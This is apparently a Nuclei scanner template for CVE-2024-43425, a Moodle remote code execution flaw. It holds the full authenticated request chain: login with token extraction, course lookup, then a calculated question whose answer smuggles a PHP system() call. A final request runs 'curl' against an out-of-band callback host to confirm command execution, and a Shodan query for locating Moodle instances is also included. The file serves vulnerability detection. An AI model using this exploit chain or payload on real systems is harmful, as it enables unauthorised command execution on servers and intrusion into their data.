127 lines
5.2 KiB
YAML
127 lines
5.2 KiB
YAML
id: CVE-2024-43425
|
|
|
|
info:
|
|
name: Moodle - Remote Code Execution
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
|
|
reference:
|
|
- https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
|
|
- https://blog.redteam-pentesting.de/2024/moodle-rce/
|
|
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
|
|
classification:
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-43425
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: title:"Moodle"
|
|
tags: cve,cve2024,moodile,rce,authenticated
|
|
|
|
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /login/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
POST /login/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
anchor=&logintoken={{token}}&username={{username}}&password={{password}}
|
|
|
|
host-redirects: true
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
name: token
|
|
group: 1
|
|
regex:
|
|
- 'name="logintoken" value="([a-zA-Z0-9]+)">'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /my/courses.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: sesskey
|
|
part: body
|
|
internal: true
|
|
group: 1
|
|
regex:
|
|
- '"sesskey":"([^"]+)"'
|
|
- raw:
|
|
- |
|
|
POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
[{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]
|
|
|
|
extractors:
|
|
- type: json
|
|
part: body
|
|
name: courseid
|
|
json:
|
|
- ".[].data.courses[0].id"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
POST /question/bank/editquestion/question.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: header
|
|
name: id
|
|
group: 1
|
|
internal: true
|
|
regex:
|
|
- "&id=([0-9]+)&"
|
|
|
|
- raw:
|
|
- |
|
|
POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: header
|
|
name: rceurl
|
|
group: 1
|
|
internal: true
|
|
regex:
|
|
- "Location: https?://.*?/question/(.*)&returnurl"
|
|
|
|
- raw:
|
|
- |
|
|
GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402206751ee480090a5e57009256b124a5b385fb35e0ad2c554e3e4e9081f07d433a602205a3c2bb69019ccd312411579022b8f9f0ffff59aebc705f23ef418df865ad97a:922c64590222798bb761d5b6d8e72950 |